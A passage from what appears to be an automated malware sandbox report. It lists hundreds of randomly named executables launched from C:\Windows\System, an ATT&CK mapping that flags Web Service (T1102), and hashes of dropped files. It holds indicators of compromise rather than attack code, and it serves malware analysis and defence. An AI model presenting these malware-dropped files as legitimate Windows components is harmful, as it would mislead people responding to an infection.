  C:\Windows\System\QMKkzWn.exe
  2⤵
  PID:9056
- C:\Windows\System\aasSnqu.exe
  C:\Windows\System\aasSnqu.exe
  2⤵
  PID:9092
- C:\Windows\System\XsFOhzu.exe
  C:\Windows\System\XsFOhzu.exe
  2⤵
  PID:9132
- C:\Windows\System\QwVjwKW.exe
  C:\Windows\System\QwVjwKW.exe
  2⤵
  PID:9156
- C:\Windows\System\WBwPsGr.exe
  C:\Windows\System\WBwPsGr.exe
  2⤵
  PID:9184
- C:\Windows\System\fWEqBMd.exe
  C:\Windows\System\fWEqBMd.exe
  2⤵
  PID:9204
- C:\Windows\System\NbXOZHl.exe
  C:\Windows\System\NbXOZHl.exe
  2⤵
  PID:7648
- C:\Windows\System\YfvaJtc.exe
  C:\Windows\System\YfvaJtc.exe
  2⤵
  PID:8240
- C:\Windows\System\glWiglg.exe
  C:\Windows\System\glWiglg.exe
  2⤵
  PID:8304
- C:\Windows\System\okreFpP.exe
  C:\Windows\System\okreFpP.exe
  2⤵
  PID:8368
- C:\Windows\System\mkiPisa.exe
  C:\Windows\System\mkiPisa.exe
  2⤵
  PID:8416
- C:\Windows\System\EbkBFpW.exe
  C:\Windows\System\EbkBFpW.exe
  2⤵
  PID:8444
- C:\Windows\System\DzzjlCn.exe
  C:\Windows\System\DzzjlCn.exe
  2⤵
  PID:8636
- C:\Windows\System\UJliDOQ.exe
  C:\Windows\System\UJliDOQ.exe
  2⤵
  PID:8712
- C:\Windows\System\yvNdiJd.exe
  C:\Windows\System\yvNdiJd.exe
  2⤵
  PID:8756
- C:\Windows\System\gqehfiw.exe
  C:\Windows\System\gqehfiw.exe
  2⤵
  PID:8776
- C:\Windows\System\ZVRTRzW.exe
  C:\Windows\System\ZVRTRzW.exe
  2⤵
  PID:8832
- C:\Windows\System\WqgTGuk.exe
  C:\Windows\System\WqgTGuk.exe
  2⤵
  PID:8908
- C:\Windows\System\LFdPAiF.exe
  C:\Windows\System\LFdPAiF.exe
  2⤵
  PID:8984
- C:\Windows\System\EAJAmjx.exe
  C:\Windows\System\EAJAmjx.exe
  2⤵
  PID:9040
- C:\Windows\System\cghyRcE.exe
  C:\Windows\System\cghyRcE.exe
  2⤵
  PID:9124
- C:\Windows\System\xrnPUcc.exe
  C:\Windows\System\xrnPUcc.exe
  2⤵
  PID:9212
- C:\Windows\System\XDMLrpd.exe
  C:\Windows\System\XDMLrpd.exe
  2⤵
  PID:8204
- C:\Windows\System\yObdYTt.exe
  C:\Windows\System\yObdYTt.exe
  2⤵
  PID:8312
- C:\Windows\System\APQHuiq.exe
  C:\Windows\System\APQHuiq.exe
  2⤵
  PID:8332
- C:\Windows\System\gMFzmFI.exe
  C:\Windows\System\gMFzmFI.exe
  2⤵
  PID:8664
- C:\Windows\System\jwjBNut.exe
  C:\Windows\System\jwjBNut.exe
  2⤵
  PID:8952
- C:\Windows\System\XPzSpEN.exe
  C:\Windows\System\XPzSpEN.exe
  2⤵
  PID:9024
- C:\Windows\System\jTACZsj.exe
  C:\Windows\System\jTACZsj.exe
  2⤵
  PID:9084
- C:\Windows\System\xfDDLrm.exe
  C:\Windows\System\xfDDLrm.exe
  2⤵
  PID:8592
- C:\Windows\System\rklsMsQ.exe
  C:\Windows\System\rklsMsQ.exe
  2⤵
  PID:8748
- C:\Windows\System\NuPUEqg.exe
  C:\Windows\System\NuPUEqg.exe
  2⤵
  PID:8820
- C:\Windows\System\WkfxAni.exe
  C:\Windows\System\WkfxAni.exe
  2⤵
  PID:7944
- C:\Windows\System\VOAMuJM.exe
  C:\Windows\System\VOAMuJM.exe
  2⤵
  PID:8692
- C:\Windows\System\gZVghxH.exe
  C:\Windows\System\gZVghxH.exe
  2⤵
  PID:9244
- C:\Windows\System\KPDGqRA.exe
  C:\Windows\System\KPDGqRA.exe
  2⤵
  PID:9272
- C:\Windows\System\dXxjvKR.exe
  C:\Windows\System\dXxjvKR.exe
  2⤵
  PID:9300
- C:\Windows\System\oMsRPLw.exe
  C:\Windows\System\oMsRPLw.exe
  2⤵
  PID:9324
- C:\Windows\System\nExBLTk.exe
  C:\Windows\System\nExBLTk.exe
  2⤵
  PID:9356
- C:\Windows\System\GlUPEEn.exe
  C:\Windows\System\GlUPEEn.exe
  2⤵
  PID:9404
- C:\Windows\System\NtjhBmH.exe
  C:\Windows\System\NtjhBmH.exe
  2⤵
  PID:9448
- C:\Windows\System\IIyWHbs.exe
  C:\Windows\System\IIyWHbs.exe
  2⤵
  PID:9468
- C:\Windows\System\HnlQYGM.exe
  C:\Windows\System\HnlQYGM.exe
  2⤵
  PID:9488
- C:\Windows\System\NhHHQDk.exe
  C:\Windows\System\NhHHQDk.exe
  2⤵
  PID:9532
- C:\Windows\System\wnIEfSL.exe
  C:\Windows\System\wnIEfSL.exe
  2⤵
  PID:9548
- C:\Windows\System\RVWwdZh.exe
  C:\Windows\System\RVWwdZh.exe
  2⤵
  PID:9568
- C:\Windows\System\JLUEhkd.exe
  C:\Windows\System\JLUEhkd.exe
  2⤵
  PID:9596
- C:\Windows\System\uSeACmk.exe
  C:\Windows\System\uSeACmk.exe
  2⤵
  PID:9624
- C:\Windows\System\AKuDfkt.exe
  C:\Windows\System\AKuDfkt.exe
  2⤵
  PID:9648
- C:\Windows\System\nmOIzxX.exe
  C:\Windows\System\nmOIzxX.exe
  2⤵
  PID:9668
- C:\Windows\System\mktHPOC.exe
  C:\Windows\System\mktHPOC.exe
  2⤵
  PID:9688
- C:\Windows\System\mKsYGZD.exe
  C:\Windows\System\mKsYGZD.exe
  2⤵
  PID:9736
- C:\Windows\System\awSjLHa.exe
  C:\Windows\System\awSjLHa.exe
  2⤵
  PID:9776
- C:\Windows\System\YJwQNOP.exe
  C:\Windows\System\YJwQNOP.exe
  2⤵
  PID:9800
- C:\Windows\System\SYvdElx.exe
  C:\Windows\System\SYvdElx.exe
  2⤵
  PID:9840
- C:\Windows\System\ajgIyuL.exe
  C:\Windows\System\ajgIyuL.exe
  2⤵
  PID:9856
- C:\Windows\System\dJhIpZx.exe
  C:\Windows\System\dJhIpZx.exe
  2⤵
  PID:9896
- C:\Windows\System\dYCPOvK.exe
  C:\Windows\System\dYCPOvK.exe
  2⤵
  PID:9920
- C:\Windows\System\ieFLeOm.exe
  C:\Windows\System\ieFLeOm.exe
  2⤵
  PID:9948
- C:\Windows\System\HglHpqC.exe
  C:\Windows\System\HglHpqC.exe
  2⤵
  PID:9964
- C:\Windows\System\tCrYQUh.exe
  C:\Windows\System\tCrYQUh.exe
  2⤵
  PID:9996
- C:\Windows\System\HGmqoVV.exe
  C:\Windows\System\HGmqoVV.exe
  2⤵
  PID:10024
- C:\Windows\System\JLDyPCu.exe
  C:\Windows\System\JLDyPCu.exe
  2⤵
  PID:10048
- C:\Windows\System\tpHgeFX.exe
  C:\Windows\System\tpHgeFX.exe
  2⤵
  PID:10084
- C:\Windows\System\SqgettN.exe
  C:\Windows\System\SqgettN.exe
  2⤵
  PID:10100
- C:\Windows\System\jJmPluL.exe
  C:\Windows\System\jJmPluL.exe
  2⤵
  PID:10128
- C:\Windows\System\sMgjUdj.exe
  C:\Windows\System\sMgjUdj.exe
  2⤵
  PID:10160
- C:\Windows\System\awICNjv.exe
  C:\Windows\System\awICNjv.exe
  2⤵
  PID:10192
- C:\Windows\System\affdJBz.exe
  C:\Windows\System\affdJBz.exe
  2⤵
  PID:10216
- C:\Windows\System\pMCCnUf.exe
  C:\Windows\System\pMCCnUf.exe
  2⤵
  PID:10232
- C:\Windows\System\uAlNaCk.exe
  C:\Windows\System\uAlNaCk.exe
  2⤵
  PID:9252
- C:\Windows\System\gHNMJtc.exe
  C:\Windows\System\gHNMJtc.exe
  2⤵
  PID:9312
- C:\Windows\System\nLOabFL.exe
  C:\Windows\System\nLOabFL.exe
  2⤵
  PID:9388
- C:\Windows\System\FwrxIiB.exe
  C:\Windows\System\FwrxIiB.exe
  2⤵
  PID:9420
- C:\Windows\System\HDWJGZo.exe
  C:\Windows\System\HDWJGZo.exe
  2⤵
  PID:9464
- C:\Windows\System\VdCguRj.exe
  C:\Windows\System\VdCguRj.exe
  2⤵
  PID:9576
- C:\Windows\System\TreMIrb.exe
  C:\Windows\System\TreMIrb.exe
  2⤵
  PID:9640
- C:\Windows\System\qrXWWOZ.exe
  C:\Windows\System\qrXWWOZ.exe
  2⤵
  PID:9716
- C:\Windows\System\aBUMvgE.exe
  C:\Windows\System\aBUMvgE.exe
  2⤵
  PID:9796
- C:\Windows\System\cpuuEVn.exe
  C:\Windows\System\cpuuEVn.exe
  2⤵
  PID:9880
- C:\Windows\System\xByakEN.exe
  C:\Windows\System\xByakEN.exe
  2⤵
  PID:9944
- C:\Windows\System\cjnMggJ.exe
  C:\Windows\System\cjnMggJ.exe
  2⤵
  PID:9960
- C:\Windows\System\qSvnbpo.exe
  C:\Windows\System\qSvnbpo.exe
  2⤵
  PID:10076
- C:\Windows\System\RrAUQgM.exe
  C:\Windows\System\RrAUQgM.exe
  2⤵
  PID:10140
- C:\Windows\System\qplLuml.exe
  C:\Windows\System\qplLuml.exe
  2⤵
  PID:9088
- C:\Windows\System\WnAxkpk.exe
  C:\Windows\System\WnAxkpk.exe
  2⤵
  PID:10224
- C:\Windows\System\WOPGMVd.exe
  C:\Windows\System\WOPGMVd.exe
  2⤵
  PID:9368
- C:\Windows\System\AUhhktx.exe
  C:\Windows\System\AUhhktx.exe
  2⤵
  PID:9456
- C:\Windows\System\RMXVPtH.exe
  C:\Windows\System\RMXVPtH.exe
  2⤵
  PID:9560
- C:\Windows\System\FUGBQeN.exe
  C:\Windows\System\FUGBQeN.exe
  2⤵
  PID:9676
- C:\Windows\System\daIjaqH.exe
  C:\Windows\System\daIjaqH.exe
  2⤵
  PID:9012
- C:\Windows\System\AxZUkYy.exe
  C:\Windows\System\AxZUkYy.exe
  2⤵
  PID:9984
- C:\Windows\System\KruWQqJ.exe
  C:\Windows\System\KruWQqJ.exe
  2⤵
  PID:10096
- C:\Windows\System\xhYPksU.exe
  C:\Windows\System\xhYPksU.exe
  2⤵
  PID:10208
- C:\Windows\System\zhQjMTW.exe
  C:\Windows\System\zhQjMTW.exe
  2⤵
  PID:9584
- C:\Windows\System\fQmDpNz.exe
  C:\Windows\System\fQmDpNz.exe
  2⤵
  PID:10268
- C:\Windows\System\nYwPBRU.exe
  C:\Windows\System\nYwPBRU.exe
  2⤵
  PID:10308
- C:\Windows\System\eufDRxT.exe
  C:\Windows\System\eufDRxT.exe
  2⤵
  PID:10364
- C:\Windows\System\jQAeALi.exe
  C:\Windows\System\jQAeALi.exe
  2⤵
  PID:10384
- C:\Windows\System\oDcrovC.exe
  C:\Windows\System\oDcrovC.exe
  2⤵
  PID:10404
- C:\Windows\System\SBlNyaI.exe
  C:\Windows\System\SBlNyaI.exe
  2⤵
  PID:10432
- C:\Windows\System\WzEFnst.exe
  C:\Windows\System\WzEFnst.exe
  2⤵
  PID:10456
- C:\Windows\System\kyouFbR.exe
  C:\Windows\System\kyouFbR.exe
  2⤵
  PID:10496
- C:\Windows\System\ujBStwI.exe
  C:\Windows\System\ujBStwI.exe
  2⤵
  PID:10516
- C:\Windows\System\znQPSLY.exe
  C:\Windows\System\znQPSLY.exe
  2⤵
  PID:10564
- C:\Windows\System\zGolpaK.exe
  C:\Windows\System\zGolpaK.exe
  2⤵
  PID:10592
- C:\Windows\System\NbWqKJk.exe
  C:\Windows\System\NbWqKJk.exe
  2⤵
  PID:10616
- C:\Windows\System\wJTuMOR.exe
  C:\Windows\System\wJTuMOR.exe
  2⤵
  PID:10636
- C:\Windows\System\oyDylfg.exe
  C:\Windows\System\oyDylfg.exe
  2⤵
  PID:10652
- C:\Windows\System\KWAVttL.exe
  C:\Windows\System\KWAVttL.exe
  2⤵
  PID:10672
- C:\Windows\System\DvCApVs.exe
  C:\Windows\System\DvCApVs.exe
  2⤵
  PID:10704
- C:\Windows\System\LqsBlDi.exe
  C:\Windows\System\LqsBlDi.exe
  2⤵
  PID:10744
- C:\Windows\System\mjNqVcD.exe
  C:\Windows\System\mjNqVcD.exe
  2⤵
  PID:10764
- C:\Windows\System\pXNvSjy.exe
  C:\Windows\System\pXNvSjy.exe
  2⤵
  PID:10804
- C:\Windows\System\wbbJrMC.exe
  C:\Windows\System\wbbJrMC.exe
  2⤵
  PID:10820
- C:\Windows\System\zpgcVbP.exe
  C:\Windows\System\zpgcVbP.exe
  2⤵
  PID:10868
- C:\Windows\System\gOXzKrp.exe
  C:\Windows\System\gOXzKrp.exe
  2⤵
  PID:10904
- C:\Windows\System\WtDtgpa.exe
  C:\Windows\System\WtDtgpa.exe
  2⤵
  PID:10924
- C:\Windows\System\hHAeGCm.exe
  C:\Windows\System\hHAeGCm.exe
  2⤵
  PID:10948
- C:\Windows\System\nMRBKNg.exe
  C:\Windows\System\nMRBKNg.exe
  2⤵
  PID:10972
- C:\Windows\System\mauJLWU.exe
  C:\Windows\System\mauJLWU.exe
  2⤵
  PID:11004
- C:\Windows\System\YWBlrrS.exe
  C:\Windows\System\YWBlrrS.exe
  2⤵
  PID:11028
- C:\Windows\System\RhUgYNn.exe
  C:\Windows\System\RhUgYNn.exe
  2⤵
  PID:11052
- C:\Windows\System\GYCRLYp.exe
  C:\Windows\System\GYCRLYp.exe
  2⤵
  PID:11096
- C:\Windows\System\TWpRDlj.exe
  C:\Windows\System\TWpRDlj.exe
  2⤵
  PID:11116
- C:\Windows\System\WwzHQuM.exe
  C:\Windows\System\WwzHQuM.exe
  2⤵
  PID:11140
- C:\Windows\System\fuBBmIQ.exe
  C:\Windows\System\fuBBmIQ.exe
  2⤵
  PID:11160
- C:\Windows\System\HvXzhCN.exe
  C:\Windows\System\HvXzhCN.exe
  2⤵
  PID:11208
- C:\Windows\System\lzIAlmG.exe
  C:\Windows\System\lzIAlmG.exe
  2⤵
  PID:11228
- C:\Windows\System\QAFMFrH.exe
  C:\Windows\System\QAFMFrH.exe
  2⤵
  PID:11248
- C:\Windows\System\OuSWiGi.exe
  C:\Windows\System\OuSWiGi.exe
  2⤵
  PID:10064
- C:\Windows\System\IQadzWb.exe
  C:\Windows\System\IQadzWb.exe
  2⤵
  PID:9480
- C:\Windows\System\cagWyGF.exe
  C:\Windows\System\cagWyGF.exe
  2⤵
  PID:10296
- C:\Windows\System\sYLmuHS.exe
  C:\Windows\System\sYLmuHS.exe
  2⤵
  PID:10412
- C:\Windows\System\QGtHNuL.exe
  C:\Windows\System\QGtHNuL.exe
  2⤵
  PID:10576
- C:\Windows\System\UwFFCdm.exe
  C:\Windows\System\UwFFCdm.exe
  2⤵
  PID:10632
- C:\Windows\System\BxMCInt.exe
  C:\Windows\System\BxMCInt.exe
  2⤵
  PID:10664
- C:\Windows\System\KYwlGkj.exe
  C:\Windows\System\KYwlGkj.exe
  2⤵
  PID:10828
- C:\Windows\System\ejJSHJm.exe
  C:\Windows\System\ejJSHJm.exe
  2⤵
  PID:10900
- C:\Windows\System\STcDtOc.exe
  C:\Windows\System\STcDtOc.exe
  2⤵
  PID:10940
- C:\Windows\System\iBJSfnh.exe
  C:\Windows\System\iBJSfnh.exe
  2⤵
  PID:10980
- C:\Windows\System\dHEBOpf.exe
  C:\Windows\System\dHEBOpf.exe
  2⤵
  PID:11080
- C:\Windows\System\GOtAqMT.exe
  C:\Windows\System\GOtAqMT.exe
  2⤵
  PID:11152
- C:\Windows\System\KRaBKAH.exe
  C:\Windows\System\KRaBKAH.exe
  2⤵
  PID:9292
- C:\Windows\System\iMEFYIf.exe
  C:\Windows\System\iMEFYIf.exe
  2⤵
  PID:10348
- C:\Windows\System\qLweweZ.exe
  C:\Windows\System\qLweweZ.exe
  2⤵
  PID:10352
- C:\Windows\System\TYEVHcQ.exe
  C:\Windows\System\TYEVHcQ.exe
  2⤵
  PID:10492
- C:\Windows\System\WGMKQiB.exe
  C:\Windows\System\WGMKQiB.exe
  2⤵
  PID:10540
- C:\Windows\System\xkEjfsf.exe
  C:\Windows\System\xkEjfsf.exe
  2⤵
  PID:10608
- C:\Windows\System\tUJlgGF.exe
  C:\Windows\System\tUJlgGF.exe
  2⤵
  PID:10896
- C:\Windows\System\MYoJOLv.exe
  C:\Windows\System\MYoJOLv.exe
  2⤵
  PID:11024
- C:\Windows\System\jUzQgUO.exe
  C:\Windows\System\jUzQgUO.exe
  2⤵
  PID:11196
- C:\Windows\System\DdosBbf.exe
  C:\Windows\System\DdosBbf.exe
  2⤵
  PID:10524
- C:\Windows\System\SnrsPch.exe
  C:\Windows\System\SnrsPch.exe
  2⤵
  PID:10812
- C:\Windows\System\SGJiqya.exe
  C:\Windows\System\SGJiqya.exe
  2⤵
  PID:10968
- C:\Windows\System\dTcyqKt.exe
  C:\Windows\System\dTcyqKt.exe
  2⤵
  PID:10292
- C:\Windows\System\glnxgLE.exe
  C:\Windows\System\glnxgLE.exe
  2⤵
  PID:10472
- C:\Windows\System\chQCJMQ.exe
  C:\Windows\System\chQCJMQ.exe
  2⤵
  PID:11280
- C:\Windows\System\fWxuxko.exe
  C:\Windows\System\fWxuxko.exe
  2⤵
  PID:11296
- C:\Windows\System\yEbyKTM.exe
  C:\Windows\System\yEbyKTM.exe
  2⤵
  PID:11320
- C:\Windows\System\QrmGpFw.exe
  C:\Windows\System\QrmGpFw.exe
  2⤵
  PID:11344
- C:\Windows\System\YRuPGEt.exe
  C:\Windows\System\YRuPGEt.exe
  2⤵
  PID:11372
- C:\Windows\System\BVJSXot.exe
  C:\Windows\System\BVJSXot.exe
  2⤵
  PID:11428
- C:\Windows\System\iWxkTXw.exe
  C:\Windows\System\iWxkTXw.exe
  2⤵
  PID:11460
- C:\Windows\System\idAJReQ.exe
  C:\Windows\System\idAJReQ.exe
  2⤵
  PID:11488
- C:\Windows\System\LPWgntu.exe
  C:\Windows\System\LPWgntu.exe
  2⤵
  PID:11508
- C:\Windows\System\xnAHdkm.exe
  C:\Windows\System\xnAHdkm.exe
  2⤵
  PID:11532
- C:\Windows\System\QPZNSvn.exe
  C:\Windows\System\QPZNSvn.exe
  2⤵
  PID:11552
- C:\Windows\System\axOaklw.exe
  C:\Windows\System\axOaklw.exe
  2⤵
  PID:11572
- C:\Windows\System\mPQxKwL.exe
  C:\Windows\System\mPQxKwL.exe
  2⤵
  PID:11600
- C:\Windows\System\VIuekfS.exe
  C:\Windows\System\VIuekfS.exe
  2⤵
  PID:11656
- C:\Windows\System\ANMSWOB.exe
  C:\Windows\System\ANMSWOB.exe
  2⤵
  PID:11684
- C:\Windows\System\pnUKIkK.exe
  C:\Windows\System\pnUKIkK.exe
  2⤵
  PID:11712
- C:\Windows\System\ItxuVcK.exe
  C:\Windows\System\ItxuVcK.exe
  2⤵
  PID:11740
- C:\Windows\System\OZZljAK.exe
  C:\Windows\System\OZZljAK.exe
  2⤵
  PID:11760
- C:\Windows\System\KbFgZop.exe
  C:\Windows\System\KbFgZop.exe
  2⤵
  PID:11784
- C:\Windows\System\VgaqlKw.exe
  C:\Windows\System\VgaqlKw.exe
  2⤵
  PID:11836
- C:\Windows\System\bWKzXKX.exe
  C:\Windows\System\bWKzXKX.exe
  2⤵
  PID:11876
- C:\Windows\System\goPIDri.exe
  C:\Windows\System\goPIDri.exe
  2⤵
  PID:11892
- C:\Windows\System\JfRvemS.exe
  C:\Windows\System\JfRvemS.exe
  2⤵
  PID:11908
- C:\Windows\System\NOUCVKy.exe
  C:\Windows\System\NOUCVKy.exe
  2⤵
  PID:11932
- C:\Windows\System\qvKUGcu.exe
  C:\Windows\System\qvKUGcu.exe
  2⤵
  PID:11956
- C:\Windows\System\fRlLlly.exe
  C:\Windows\System\fRlLlly.exe
  2⤵
  PID:11972
- C:\Windows\System\pbqxGvx.exe
  C:\Windows\System\pbqxGvx.exe
  2⤵
  PID:12012
- C:\Windows\System\onvCjQx.exe
  C:\Windows\System\onvCjQx.exe
  2⤵
  PID:12028
- C:\Windows\System\bIQMWlC.exe
  C:\Windows\System\bIQMWlC.exe
  2⤵
  PID:12068
- C:\Windows\System\vZOjPPw.exe
  C:\Windows\System\vZOjPPw.exe
  2⤵
  PID:12084
- C:\Windows\System\ODjccpw.exe
  C:\Windows\System\ODjccpw.exe
  2⤵
  PID:12104
- C:\Windows\System\PDNZDHn.exe
  C:\Windows\System\PDNZDHn.exe
  2⤵
  PID:12132
- C:\Windows\System\rvCbhuU.exe
  C:\Windows\System\rvCbhuU.exe
  2⤵
  PID:12152
- C:\Windows\System\dVgFWbh.exe
  C:\Windows\System\dVgFWbh.exe
  2⤵
  PID:12176
- C:\Windows\System\UMqUomI.exe
  C:\Windows\System\UMqUomI.exe
  2⤵
  PID:12220
- C:\Windows\System\EwJrQdO.exe
  C:\Windows\System\EwJrQdO.exe
  2⤵
  PID:12236
- C:\Windows\System\JfZewez.exe
  C:\Windows\System\JfZewez.exe
  2⤵
  PID:12264
- C:\Windows\System\LhobNsG.exe
  C:\Windows\System\LhobNsG.exe
  2⤵
  PID:12284
- C:\Windows\System\SjUZMqG.exe
  C:\Windows\System\SjUZMqG.exe
  2⤵
  PID:10448
- C:\Windows\System\kLtdLQH.exe
  C:\Windows\System\kLtdLQH.exe
  2⤵
  PID:11288
- C:\Windows\System\KBXwACq.exe
  C:\Windows\System\KBXwACq.exe
  2⤵
  PID:11332
- C:\Windows\System\pCurKsB.exe
  C:\Windows\System\pCurKsB.exe
  2⤵
  PID:11480
- C:\Windows\System\BDNFQUJ.exe
  C:\Windows\System\BDNFQUJ.exe
  2⤵
  PID:11564
- C:\Windows\System\APqYkST.exe
  C:\Windows\System\APqYkST.exe
  2⤵
  PID:11680
- C:\Windows\System\DwiNJcw.exe
  C:\Windows\System\DwiNJcw.exe
  2⤵
  PID:11768
- C:\Windows\System\jVvCbtK.exe
  C:\Windows\System\jVvCbtK.exe
  2⤵
  PID:11780
- C:\Windows\System\ERQbSpU.exe
  C:\Windows\System\ERQbSpU.exe
  2⤵
  PID:11832
- C:\Windows\System\CUOkCIf.exe
  C:\Windows\System\CUOkCIf.exe
  2⤵
  PID:11888
- C:\Windows\System\jMZnGMj.exe
  C:\Windows\System\jMZnGMj.exe
  2⤵
  PID:11964
- C:\Windows\System\OGONvWp.exe
  C:\Windows\System\OGONvWp.exe
  2⤵
  PID:1584
- C:\Windows\System\GbBonfF.exe
  C:\Windows\System\GbBonfF.exe
  2⤵
  PID:12144
- C:\Windows\System\DzPpPgs.exe
  C:\Windows\System\DzPpPgs.exe
  2⤵
  PID:12140
- C:\Windows\System\UqxwqHw.exe
  C:\Windows\System\UqxwqHw.exe
  2⤵
  PID:12232
- C:\Windows\System\KnQaril.exe
  C:\Windows\System\KnQaril.exe
  2⤵
  PID:10844
- C:\Windows\System\LIqMimS.exe
  C:\Windows\System\LIqMimS.exe
  2⤵
  PID:11408
- C:\Windows\System\LILpAaW.exe
  C:\Windows\System\LILpAaW.exe
  2⤵
  PID:11468
- C:\Windows\System\irJrFvL.exe
  C:\Windows\System\irJrFvL.exe
  2⤵
  PID:11568
- C:\Windows\System\nGaojGR.exe
  C:\Windows\System\nGaojGR.exe
  2⤵
  PID:11644
- C:\Windows\System\VtTJkGd.exe
  C:\Windows\System\VtTJkGd.exe
  2⤵
  PID:11860
- C:\Windows\System\RJKkeZu.exe
  C:\Windows\System\RJKkeZu.exe
  2⤵
  PID:2556
- C:\Windows\System\fbRHdBl.exe
  C:\Windows\System\fbRHdBl.exe
  2⤵
  PID:12208
- C:\Windows\System\dzxFryu.exe
  C:\Windows\System\dzxFryu.exe
  2⤵
  PID:11368
- C:\Windows\System\zhLVdRD.exe
  C:\Windows\System\zhLVdRD.exe
  2⤵
  PID:11444
- C:\Windows\System\ntvuFQU.exe
  C:\Windows\System\ntvuFQU.exe
  2⤵
  PID:11752
- C:\Windows\System\IXbzmEZ.exe
  C:\Windows\System\IXbzmEZ.exe
  2⤵
  PID:12188
- C:\Windows\System\fnfKxGN.exe
  C:\Windows\System\fnfKxGN.exe
  2⤵
  PID:12228
- C:\Windows\System\sZDHwia.exe
  C:\Windows\System\sZDHwia.exe
  2⤵
  PID:1560
- C:\Windows\System\hehVaeU.exe
  C:\Windows\System\hehVaeU.exe
  2⤵
  PID:12324
- C:\Windows\System\xbfbynW.exe
  C:\Windows\System\xbfbynW.exe
  2⤵
  PID:12352
- C:\Windows\System\gfGpRJd.exe
  C:\Windows\System\gfGpRJd.exe
  2⤵
  PID:12372
- C:\Windows\System\daoPpAc.exe
  C:\Windows\System\daoPpAc.exe
  2⤵
  PID:12404
- C:\Windows\System\XbjXFJe.exe
  C:\Windows\System\XbjXFJe.exe
  2⤵
  PID:12436
- C:\Windows\System\KSYBIOR.exe
  C:\Windows\System\KSYBIOR.exe
  2⤵
  PID:12468
- C:\Windows\System\HghgYKN.exe
  C:\Windows\System\HghgYKN.exe
  2⤵
  PID:12496
- C:\Windows\System\txManee.exe
  C:\Windows\System\txManee.exe
  2⤵
  PID:12520
- C:\Windows\System\wHFigmL.exe
  C:\Windows\System\wHFigmL.exe
  2⤵
  PID:12536
- C:\Windows\System\xFBGIaw.exe
  C:\Windows\System\xFBGIaw.exe
  2⤵
  PID:12556
- C:\Windows\System\QnChTRQ.exe
  C:\Windows\System\QnChTRQ.exe
  2⤵
  PID:12580
- C:\Windows\System\zMeCrsY.exe
  C:\Windows\System\zMeCrsY.exe
  2⤵
  PID:12608
- C:\Windows\System\VtxdUQB.exe
  C:\Windows\System\VtxdUQB.exe
  2⤵
  PID:12628
- C:\Windows\System\RhcZleG.exe
  C:\Windows\System\RhcZleG.exe
  2⤵
  PID:12652
- C:\Windows\System\oQxGHRk.exe
  C:\Windows\System\oQxGHRk.exe
  2⤵
  PID:12696
- C:\Windows\System\nqdqIIR.exe
  C:\Windows\System\nqdqIIR.exe
  2⤵
  PID:12724
- C:\Windows\System\IBfrviR.exe
  C:\Windows\System\IBfrviR.exe
  2⤵
  PID:12748
- C:\Windows\System\tGMYKoo.exe
  C:\Windows\System\tGMYKoo.exe
  2⤵
  PID:12780
- C:\Windows\System\eLbnjts.exe
  C:\Windows\System\eLbnjts.exe
  2⤵
  PID:12812
- C:\Windows\System\OVfQVXB.exe
  C:\Windows\System\OVfQVXB.exe
  2⤵
  PID:12852
- C:\Windows\System\wXoDJKn.exe
  C:\Windows\System\wXoDJKn.exe
  2⤵
  PID:12892
- C:\Windows\System\oDDCFDz.exe
  C:\Windows\System\oDDCFDz.exe
  2⤵
  PID:12912
- C:\Windows\System\eyHRPRO.exe
  C:\Windows\System\eyHRPRO.exe
  2⤵
  PID:12928
- C:\Windows\System\iPWoeZk.exe
  C:\Windows\System\iPWoeZk.exe
  2⤵
  PID:12948
- C:\Windows\System\mbakRzm.exe
  C:\Windows\System\mbakRzm.exe
  2⤵
  PID:12988
- C:\Windows\System\aVtcrkx.exe
  C:\Windows\System\aVtcrkx.exe
  2⤵
  PID:13016
- C:\Windows\System\zPIMCgm.exe
  C:\Windows\System\zPIMCgm.exe
  2⤵
  PID:13032
- C:\Windows\System\OLpXKfC.exe
  C:\Windows\System\OLpXKfC.exe
  2⤵
  PID:13056
- C:\Windows\System\KFZvAkD.exe
  C:\Windows\System\KFZvAkD.exe
  2⤵
  PID:13072
- C:\Windows\System\WTJJWWu.exe
  C:\Windows\System\WTJJWWu.exe
  2⤵
  PID:13112
- C:\Windows\System\MPFpNMa.exe
  C:\Windows\System\MPFpNMa.exe
  2⤵
  PID:13176
- C:\Windows\System\PyElQGs.exe
  C:\Windows\System\PyElQGs.exe
  2⤵
  PID:13200
- C:\Windows\System\zgbbglG.exe
  C:\Windows\System\zgbbglG.exe
  2⤵
  PID:13224
- C:\Windows\System\jmvhUPR.exe
  C:\Windows\System\jmvhUPR.exe
  2⤵
  PID:13264
- C:\Windows\System\SicEYwP.exe
  C:\Windows\System\SicEYwP.exe
  2⤵
  PID:13288
- C:\Windows\System\VuPKbYc.exe
  C:\Windows\System\VuPKbYc.exe
  2⤵
  PID:12308
- C:\Windows\System\yORvdRH.exe
  C:\Windows\System\yORvdRH.exe
  2⤵
  PID:12368
- C:\Windows\System\SPizqov.exe
  C:\Windows\System\SPizqov.exe
  2⤵
  PID:12980
- C:\Windows\System\kwIhsUp.exe
  C:\Windows\System\kwIhsUp.exe
  2⤵
  PID:12396
- C:\Windows\System\IrWxBsm.exe
  C:\Windows\System\IrWxBsm.exe
  2⤵
  PID:12712
- C:\Windows\System\yZCUkKl.exe
  C:\Windows\System\yZCUkKl.exe
  2⤵
  PID:12740
- C:\Windows\System\PhjXOXK.exe
  C:\Windows\System\PhjXOXK.exe
  2⤵
  PID:12808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9O7X9C7J\home-993d2c38b2c1[1].css

Filesize
11KB

MD5
6328d6d9a6b00ce7f992230b97b17c1f

SHA1
88837b802bdde407e37e92641072ea2eeec95556

SHA256
c9d9b80794cebd7d97daf52f7f0ce0e31bcf7a6f65a6e07851c688d67f10dba8

SHA512
993d2c38b2c15499aebdb39c1f9c21d0501d4c2a5973caec65be9ddc3ddfd6e46d06449e7483daa4fa9afa17cb81ff27a391519a64629169eb15c52911aab2c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tubzbrnp.3gl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
